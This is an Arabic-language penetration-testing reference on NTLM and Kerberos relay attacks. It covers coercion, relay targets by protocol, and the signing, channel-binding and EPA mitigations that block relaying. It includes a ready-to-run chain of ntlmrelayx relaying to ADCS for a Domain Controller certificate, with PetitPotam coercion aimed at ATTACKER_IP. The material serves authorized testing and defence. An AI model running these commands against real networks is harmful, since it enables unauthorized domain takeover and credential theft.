
مرجع تقني لتقنيات الترحيل المتعددة
مرجع شامل لهجمات الترحيل NTLM أثناء اختبارات الاختراق الداخلية المصرح بها. يغطي أساسيات المصادقة، تقنيات الإكراه، أهداف الترحيل لكل بروتوكول، الأدوات، التسلسل المتقدم، والتخفيفات الدفاعية.
ينطبق على ترحيل NTLM التقليدي في البيئات الحديثة المصححة (ما بعد CVE-2019-1040). للحصول على تحليل مفصل عبر البروتوكولات، راجع الترحيل عبر البروتوكولات.
* يجب ألا يتطلب الهدف توقيع SMB † يتضمن NTLM القادم من SMB علامات توقيع في NEGOTIATE، وهو ما يفرضه LDAP و ADCS HTTP — مما يؤدي إلى أن الجلسة المرحلة تحتاج إلى مفتاح توقيع لا يمتلكه المهاجم. لهذا السبب يُفضّل استخدام المصادقة القادمة من WebDAV/HTTP لترحيل LDAP و ADCS.
بدائية Cymulate / CVE-2026-20929 (يناير 2026) — يقوم المهاجم بتسميم DNS بـ CNAME، ويقوم Windows بتوحيد SPN، ويطلب العميل TGS للهدف الذي اختاره المهاجم، ثم يتم ترحيل AP-REQ. نظرًا لأن العديد من الخدمات تقبل التذاكر بناءً فقط على جزء DNS من SPN، فإن فئة SPN المصدرية أقل أهمية بكثير مما هي عليه في ترحيل NTLM — ما يحدد نجاح الهجوم هو ما إذا كانت الخدمة المستهدفة تفرض عنصر التحكم الخاص بها في مكافحة الترحيل.
جميع الصفوف تفترض أن المهاجم لديه موقف شبكي لتسميم DNS (DHCPv6 عبر mitm6، ARP، DHCPv4 المارقة). للتقنية الكاملة: ترحيل Kerberos عبر إساءة استخدام CNAME DNS.
# مثال كلاسيكي: إكراه وحدة التحكم بالمجال، الترحيل إلى ADCS للحصول على شهادة وحدة التحكم بالمجال
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
| مصدر المصادقة | → SMB | → LDAP | → MSSQL | → HTTP | → ADCS | → SOCKS |
|---|
| SMB | ✅* | ❌† | ✅ | ✅ | ❌† | ✅ |
| HTTP | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| WebDAV | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| MSSQL | ✅* | ✅ | ✅ | ✅ | ✅ | ✅ |
| الخدمة المستهدفة | قابل للترحيل ما لم... | التصحيح / الحالة |
|---|
| SMB | توقيع SMB مطلوب على الهدف | — |
| LDAP | توقيع LDAP مطلوب | — |
| LDAPS | LdapEnforceChannelBinding = 2 (دائمًا) | — |
| HTTP / IIS | فرض HTTP CBT (التحقق من رمز HTTP.sys = مطلوب) | CVE-2026-20929 يعيد فرض HTTP.sys CBT |
ADCS /certsrv/ | الحماية الموسعة = مطلوبة على vdir | ينطبق فرض HTTP.sys CBT عبر CVE-2026-20929 |
| MSSQL | الحماية الموسعة مفعلة | — |
| Exchange (OWA/ECP/…) | EPA على جميع الأدلة الافتراضية | — |